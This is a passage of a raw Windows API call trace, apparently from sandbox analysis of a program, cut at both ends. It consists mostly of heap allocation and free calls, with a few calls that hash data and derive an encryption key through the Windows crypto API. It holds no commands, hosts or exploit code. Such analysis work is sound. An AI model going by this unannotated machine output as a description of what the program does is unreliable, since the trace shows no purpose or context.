Size=0x10) returned 0x43caf10 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0133.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43cad90 [0133.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0133.945] CryptHashData (hHash=0x41ac440, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0133.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0133.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0133.947] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0133.947] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0133.947] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0133.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0133.948] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0133.948] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0133.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0133.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0133.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0133.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cb018 [0133.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb018, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0133.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.952] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0133.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0133.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0133.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0133.952] CryptDestroyHash (hHash=0x41ac440) returned 1 [0133.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0133.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0133.954] 